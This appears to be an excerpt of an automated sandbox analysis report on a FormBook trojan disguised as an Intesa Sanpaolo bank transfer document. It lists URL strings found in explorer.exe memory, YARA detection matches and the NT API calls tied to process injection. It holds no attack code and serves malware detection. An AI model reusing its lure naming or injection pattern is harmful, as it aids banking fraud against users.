          Source: explorer.exe, 00000007.00000002.3770457753.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000007.00000002.3770457753.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.000000000866C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://buy.live.com/
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
          Source: explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
          Source: explorer.exe, 00000007.00000002.3770457753.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hHhh7.img
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.co
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps
          Source: explorer.exe, 00000007.00000003.3082354103.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3771486078.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2192144452.0000000008903000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://passwordreset.micros
          Source: explorer.exe, 00000007.00000002.3775303278.000000000B9B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1379438012.000000000B9B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comeer0
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tip.passwordreset.microso
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000007.00000003.3081656079.00000000087ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/best-cities-by-generation/

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,6_2_0041A540
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041A35A NtCreateFile,6_2_0041A35A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041A40A NtReadFile,6_2_0041A40A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102B60 NtClose,LdrInitializeThunk,6_2_01102B60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01102BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102AD0 NtReadFile,LdrInitializeThunk,6_2_01102AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102D10 NtMapViewOfSection,LdrInitializeThunk,6_2_01102D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_01102D30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102DD0 NtDelayExecution,LdrInitializeThunk,6_2_01102DD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01102DF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01102C70
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_01102CA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102F30 NtCreateSection,LdrInitializeThunk,6_2_01102F30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102F90 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01102F90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102FB0 NtResumeThread,LdrInitializeThunk,6_2_01102FB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102FE0 NtCreateFile,LdrInitializeThunk,6_2_01102FE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_01102E80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01102EA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01104340 NtSetContextThread,6_2_01104340
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01104650 NtSuspendThread,6_2_01104650
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102B80 NtQueryInformationFile,6_2_01102B80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102BA0 NtEnumerateValueKey,6_2_01102BA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102BE0 NtQueryValueKey,6_2_01102BE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102AB0 NtWaitForSingleObject,6_2_01102AB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102AF0 NtWriteFile,6_2_01102AF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102D00 NtSetInformationFile,6_2_01102D00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102DB0 NtEnumerateKey,6_2_01102DB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102C00 NtQueryInformationProcess,6_2_01102C00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102C60 NtCreateKey,6_2_01102C60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102CC0 NtQueryVirtualMemory,6_2_01102CC0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102CF0 NtOpenProcess,6_2_01102CF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102F60 NtCreateProcessEx,6_2_01102F60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102FA0 NtQuerySection,6_2_01102FA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102E30 NtWriteVirtualMemory,6_2_01102E30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102EE0 NtQueueApcThread,6_2_01102EE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01103010 NtOpenDirectoryObject,6_2_01103010
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01103090 NtSetValueKey,6_2_01103090
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011035C0 NtCreateMutant,6_2_011035C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011039B0 NtGetContextThread,6_2_011039B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01103D10 NtOpenProcessToken,6_2_01103D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01103D70 NtOpenThread,6_2_01103D70
          Source: C:\Windows\explorer.exeCode function: 7_2_0C611232 NtCreateFile,7_2_0C611232
          Source: C:\Windows\explorer.exeCode function: 7_2_0C612E12 NtProtectVirtualMemory,7_2_0C612E12
          Source: C:\Windows\explorer.exeCode function: 7_2_0C612E0A NtProtectVirtualMemory,7_2_0C612E0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_047C2C70
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2C60 NtCreateKey,LdrInitializeThunk,8_2_047C2C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_047C2CA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_047C2D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_047C2DF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2DD0 NtDelayExecution,LdrInitializeThunk,8_2_047C2DD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_047C2EA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2F30 NtCreateSection,LdrInitializeThunk,8_2_047C2F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2FE0 NtCreateFile,LdrInitializeThunk,8_2_047C2FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2AD0 NtReadFile,LdrInitializeThunk,8_2_047C2AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2B60 NtClose,LdrInitializeThunk,8_2_047C2B60
